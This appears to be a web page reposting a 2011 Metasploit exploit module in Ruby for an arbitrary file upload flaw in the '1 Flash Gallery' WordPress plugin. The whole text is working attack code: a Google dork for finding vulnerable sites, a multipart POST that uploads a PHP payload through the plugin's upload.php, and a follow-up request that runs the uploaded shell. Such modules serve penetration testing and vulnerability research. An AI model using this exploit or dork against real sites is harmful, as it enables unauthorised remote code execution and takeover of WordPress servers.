扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 |
# Exploit Title: 1 Flash Gallery WordPress Plugin Arbitrary File Upload Exploit # # Google Dork:inurl:"wp-content/plugins/1-flash-gallery" # # Date: 09/06/2011 # # Author: Ben Schmidt # # Software Link: http://downloads.wordpress.org/plugin/1-flash-gallery.1.5.6.zip # # Version: v1.30 to v1.5.7a (tested on 1.5.6 and 1.5.7 prior to patch) require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => '1 Flash Gallery WordPress Plugin File Upload Exploit', 'Description'=> %q{ This module exploits an arbitrary file upload vulnerability in the '1 Flash Gallery' WordPress plugin. }, 'Author' => [ 'Ben Schmidt'], 'License'=> MSF_LICENSE, 'References' => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ], 'Privileged' => false, 'Payload'=> { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as an HTTP # POST request, so it's possible this might be smaller (maybe?) # but very unlikely. 'Space' => 262144, # 256k }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets'=> [[ 'Automatic', { }]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sept 6, 2011' )) register_options([ OptString.new('URI', [true, "Path to WordPress", "/"]), ], self.class) end def exploit boundary = rand_text_alphanumeric(6) fn = rand_text_alphanumeric(8) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; " data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n" data << payload.encoded data << "\r\n--#{boundary}--" res = send_request_raw({ 'uri' => datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php", 'method'=> 'POST', 'data'=> data, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => data.length, } }, 25) if (res) print_status("Successfully uploaded shell.") shell_path = res.body.split("_")[0] print_status("Trying to access shell at #{shell_path}...") res = send_request_raw({ 'uri' => datastore['URI'] + shell_path, 'method'=> 'GET', }, 0.01) else print_error("Error uploading shell") end handler end end |
体验盒子
